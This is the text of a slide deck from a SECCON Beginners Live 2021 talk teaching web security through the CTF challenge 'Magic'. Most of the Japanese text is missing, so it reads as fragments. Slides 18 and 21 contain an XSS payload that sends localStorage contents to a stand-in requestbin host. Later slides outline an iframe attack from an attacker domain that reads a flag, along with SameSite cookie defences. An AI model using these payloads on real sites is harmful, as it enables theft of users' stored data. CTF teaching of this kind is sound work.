Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
by
Hi120ki
Link
Embed
Share
Beginning
This slide
Copy link URL
Copy link URL
Copy iframe embed code
Copy iframe embed code
Copy javascript embed code
Copy javascript embed code
Share
Tweet
Share
Tweet
Slide 1
Slide 1 text
Magic Web SECCON Beginners Live 2021 hi120ki
Slide 2
Slide 2 text
@hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing : firmware Web : json, magic
Slide 3
Slide 3 text
Web Magic 3
Slide 4
Slide 4 text
Magic [Web Hard] : 31solve Web 5 • • 4
Slide 5
Slide 5 text
5 /
Slide 6
Slide 6 text
6 /
Slide 7
Slide 7 text
7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
Slide 8
Slide 8 text
8 / URL
Slide 9
Slide 9 text
9 /
Slide 10
Slide 10 text
10 crawler/index.js puppeteer Node.js Chrome URL
Slide 11
Slide 11 text
11 2. FLAG 3. URL crawler/index.js 1.
Slide 12
Slide 12 text
12 FLAG nginx/html/static/index.js FLAG
Slide 13
Slide 13 text
13 FLAG JavaScript XSS( )
Slide 14
Slide 14 text
XSS 14 HTML Web HTML JavaScript Cookie Web
Slide 15
Slide 15 text
15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG
Slide 16
Slide 16 text
16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG …
Slide 17
Slide 17 text
17 FLAG … FLAG https://magic.quals.beginners.seccon.jp/??????????
Slide 18
Slide 18 text
18 fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); FLAG XSS URL
Slide 19
Slide 19 text
XSS 19 magic/views/index.ejs
Slide 20
Slide 20 text
20 alert(1)
Slide 21
Slide 21 text
21 FLAG URL fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo")));
Slide 22
Slide 22 text
22 FLAG URL
Slide 23
Slide 23 text
23 XSS https://magic.quals.beginners.seccon.jp/
Slide 24
Slide 24 text
24 … https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS
Slide 25
Slide 25 text
25 ... + = ? XSS
Slide 26
Slide 26 text
26 … https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL … FLAG
Slide 27
Slide 27 text
27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
Slide 28
Slide 28 text
28 URL
Slide 29
Slide 29 text
29 … https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ … FLAG XSS
Slide 30
Slide 30 text
30 FLAG 1. FLAG 2. 3.
Slide 31
Slide 31 text
31
Slide 32
Slide 32 text
1. XSS 2. 3. 32
Slide 33
Slide 33 text
1. XSS 2. 3. 33 FLAG
Slide 34
Slide 34 text
1. XSS 2. 3. 34
Slide 35
Slide 35 text
1. XSS 2. 3. 35
Slide 36
Slide 36 text
36 FLAG
Slide 37
Slide 37 text
XSS • • Byte Bandits CTF 2020 Notes App • https://github.com/ByteBandits/bbctf-2020 37
Slide 38
Slide 38 text
Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= • FLAG iframe • • API
Slide 39
Slide 39 text
iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL iframe
Slide 40
Slide 40 text
iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe
Slide 41
Slide 41 text
iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG ... XSS FLAG
Slide 42
Slide 42 text
iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML) ...
Slide 43
Slide 43 text
43 iframe SameSite Cookie None Lax
Slide 44
Slide 44 text
44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...) FLAG
Slide 45
Slide 45 text
45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...) FLAG
Slide 46
Slide 46 text
SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie (session=nj49gn...) ✕ FLAG ...
Slide 47
Slide 47 text
47 SameSite Cookie=None iframe CTF
Slide 48
Slide 48 text
48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... ( XSS Content-Security-Policy )
Slide 49
Slide 49 text
49 FLAG +
Slide 50
Slide 50 text
50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup https://hi120ki.github.io/blog/posts/20210523-3/